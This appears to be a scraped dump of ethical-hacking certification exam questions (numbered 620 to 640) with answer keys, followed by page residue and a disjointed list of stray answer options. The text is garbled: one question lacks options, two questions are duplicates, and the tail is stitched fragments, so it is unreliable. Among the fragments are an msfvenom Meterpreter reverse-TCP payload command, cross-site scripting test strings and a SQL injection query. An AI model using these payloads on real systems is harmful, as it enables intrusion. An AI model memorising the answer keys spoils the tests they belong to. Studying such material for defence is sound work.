Correct Answer: A
Section: (none)
Explanation
QUESTION 620
You are the Systems Administrator for a large corporate organization. You need to monitor all network traffic on
your local network for suspicious activities andreceive notifications when an attack is occurring. Which tool
would allow you to accomplish this goal?
A. Network-based IDS
B. Firewall
C. Proxy
D. Host-based IDS
Correct Answer: A
Section: (none)
Explanation
QUESTION 621
What does a firewall check to prevent particular ports and applications from getting packets into an
organization?
A. Transport layer port numbers and application layer headers

B. Presentation layer headers and the session layer port numbers
C. Network layer headers and the session layer port numbers
D. Application layer port numbers and the transport layer headers
Correct Answer: A
Section: (none)
Explanation
QUESTION 622
You work as a Security Analyst for a retail organization. In securing the company's network, you set up a
firewall and an IDS. However, hackers are able to attackthe network. After investigating, you discover that your
IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert isthe
IDS giving?
A. False Negative
B. False Positive
C. True Negative
D. True Positive
Correct Answer: A
Section: (none)
Explanation
QUESTION 623
Which of the following types of firewalls ensures that the packets are part of the established session?
A. Stateful inspection firewall

B. Circuit-level firewall
C. Application-level firewall
D. Switch-level firewall
Correct Answer: A
Section: (none)
Explanation
QUESTION 624
Which of the following incident handling process phases is responsible for defining rules, collaborating human
workforce, creating a back-up plan, and testing theplans for an organization?
C. Identification phase
D. Recovery phase
Correct Answer: A
Section: (none)
Explanation
QUESTION 625
Ricardo wants to send secret messages to a competitor company. To secure these messages, he uses a
technique of hiding a secret message within an ordinarymessage. The technique provides 'security through
obscurity'.
What technique is Ricardo using?

A. Steganography
B. Public-key cryptography
C. RSA algorithm
D. Encryption
Correct Answer: A
Section: (none)
Explanation
QUESTION 626
During a security audit of IT processes, an IS auditor found that there were no documented security
procedures. What should the IS auditor do?
A. Identify and evaluate existing practices

B. Create a procedures document
C. Conduct compliance testing
D. Terminate the audit
Correct Answer: A
Section: (none)
Explanation
QUESTION 627
Which of the following statements regarding ethical hacking is incorrect?
A. Ethical hackers should never use tools or methods that have the potential of exploiting vulnerabilities in an
organization's systems.
B. Testing should be remotely performed offsite.
C. An organization should use ethical hackers who do not sell vendor hardware/software or other consulting
services.
D. Ethical hacking should not involve writing to or modifying the target systems.
Correct Answer: A
Section: (none)
Explanation
QUESTION 628
Craig received a report of all the computers on the network that showed all the missing patches and weak
passwords. What type of software generated this report?
A. a port scanner
B. a vulnerability scanner
C. a virus scanner
D. a malware scanner
Correct Answer: B
Section: (none)
Explanation
QUESTION 629
Sophia travels a lot and worries that her laptop containing confidential documents might be stolen. What is the
best protection that will work for her?
A. Password protected files

B. Hidden folders
C. BIOS password
D. Full disk encryption.
Correct Answer: D
Section: (none)
Explanation
QUESTION 630
The network in ABC company is using the network address 192.168.1.64 with mask 255.255.255.192. In the
network the servers are in the addresses 192.168.1.122, 192.168.1.123 and 192.168.1.124.
An attacker is trying to find those servers but he cannot see them in his scanning. The command he is using
is:nmap 192.168.1.64/28.
Why he cannot see the servers?
A. The network must be down and the nmap command and IP address are ok.
B. He needs to add the command ''''ip address'''' just before the IP address.
C. He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that
range.
D. He needs to change the address to 192.168.1.0 with the same mask.
Correct Answer: C
Section: (none)
Explanation
QUESTION 631
An unauthorized individual enters a building following an employee through the employee entrance after the
lunch rush. What type of breach has the individual just performed?
A. Reverse Social Engineering

B. Tailgating
C. Piggybacking
D. Announced
Correct Answer: B
Section: (none)
Explanation
QUESTION 632
Which of the following is the best countermeasure to encrypting ransomwares?
A. Use multiple antivirus softwares

B. Keep some generation of off-line backup
C. Analyze the ransomware to get decryption key of encrypted data
D. Pay a ransom
Correct Answer: B
Section: (none)
Explanation
QUESTION 633
If an attacker uses the command SELECT*FROM user WHERE name = "~x' AND userid IS NULL; --"~; which
type of SQL injection attack is the attacker performing?
A. End of Line Comment

B. UNION SQL Injection
C. Illegal/Logically Incorrect Query
D. Tautology
Correct Answer: C
Section: (none)
Explanation
QUESTION 634
Sophia travels a lot and worries that her laptop containing confidential documents might be stolen. What is the
best protection that will work for her?
A. Full Disk encryption

B. BIOS password
C. Hidden folders
D. Password protected files
Correct Answer: A
Section: (none)
Explanation
QUESTION 635
An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to
"www.MyPersonalBank.com", that the user is directed to a phishing site.
Which file does the attacker need to modify?
A. Boot.ini
B. Sudoers
C. Networks
D. Hosts
Correct Answer: D
Section: (none)
Explanation
QUESTION 636
Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a
signature-based IDS?
A. Produces less false positives

B. Can identify unknown attacks
C. Requires vendor updates for a new threat
D. Cannot deal with encrypted network traffic
Correct Answer: B
Section: (none)
Explanation
QUESTION 637
You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management
Console from command line.
Which command would you use?
A. c:\gpedit
B. c:\compmgmt.msc
C. c:\ncpa.cp
D. c:\services.msc
Correct Answer: B
Section: (none)
Explanation
QUESTION 638
Which of the following act requires employer's standard national numbers to identify them on standard
transactions?
A. SOX
B. HIPAA
C. DMCA
D. PCI-DSS
Correct Answer: B
Section: (none)
Explanation
QUESTION 639
In Wireshark, the packet bytes panes show the data of the current packet in which format?
A. Decimal
B. ASCII only
C. Binary
D. Hexadecimal
Correct Answer: D
Section: (none)
Explanation
QUESTION 640
Is a set of extensions to DNS that provide the origin authentication of DNS data to DNS clients (resolvers) so as
to reduce the threat of DNS poisoning, spoofing, and similar types of attacks.
A. DNSSEC
B. Resource records
C. Resource transfer
D. Zone transfer
Correct Answer: A
Section: (none)
Explanation

Exam 312-50 640

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Exam 312-50 640

Uploaded by

Copyright:

Available Formats

Exam A

A. Quid pro quo

A. Cloud hopper attack

A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

A. use of command-line interface

A. Vulnerability hunting program

A. Use his own public key to encrypt the message.

A. Password key hashing

A. The attacker queries a nameserver using the DNS resolver.

A. Delete the wireless network

A. Tier-1: Developer machines

A. There is no firewall in place.

A. Dark web footprinting

A. SMS phishing attack

A. Both are symmetric algorithms, but AES uses 256-bit keys.

A. Using the Metasploit psexec module setting the SA / Admin credential

A. Netsh firewall show config

no responseTCP port 22 no response

Using the Exlcusive OR, what was the original message?

Which of the following is an issue with the situation?

A. Set a BIOS password.

Which of the following actions should the security administrator take?

A. 64 bit and CCMP

A. Injecting parameters into a connection string using semicolons as a separator

A. Input validation flaw

A. An attacker, working slowly enough, can evade detection by the IDS.

A. Drops the packet and moves on to the nextone

A. The wireless card was not turned on.

1 [10.0.0.252]# nmap -sO 10.0.0.2

A. They are written in Java.They send alerts to securitymonitors.

A. USB token and PIN

A. Recipient's private key

A. g++ hackersExploit.cpp -o calc.exe

A. Issue the pivot exploit and set themeterpreter.

A. Sniffer, Packet Logger, and Network Intrusion Detection System

A. Extensible Authentication Protocol(EAP)

A. Tracking version changes of source code

A. tcp.src == 25 and ip.host == 192.168.0.125 B. host192.168.0.125:25

A. PIN Number and Birth Date

A. 768 bit key

A. LM hashes consist in 48 hexadecimal characters.

A. if (billingAddress = 50) {update field} else exit

IMG SRC=vbscript:msgbox("Vulnerable");> originalAttribute="SRC" originalPath="vbscript:msgbox

browser returns a pop-up window that says "Vulnerable".

A. Cross-site request forgery

A. A stealth scan, opening port 123 and153

A. Netstat WMI Scan

A. The operating system performs a one-way hash of the passwords.

n sS P0 p 80 ***.***.**.** What type ofscan is this?

A. Perform a dictionary attack.

A. Limit the packets captured to the snort configuration file.

A. Active and passive

A. Something you: know, remember, prove

A. Scripting languages are hard tolearn.

A. Placing the router in broadcast mode

A. Multiple keys for non-repudiation of bulk data

A. Investigate based on the maintenance schedule of the affected systems.

company's web server.

A. Unplug the network connection on the

A. A static NAT uses a many-to-manymapping.

<script>alert(" Testing Testing Testing ")</script>

A. They provide a repeatableframework.

A. An extensible security framework named COBIT

A. Sender's public key

n sS P0 p 80 ... What type ofscan is this?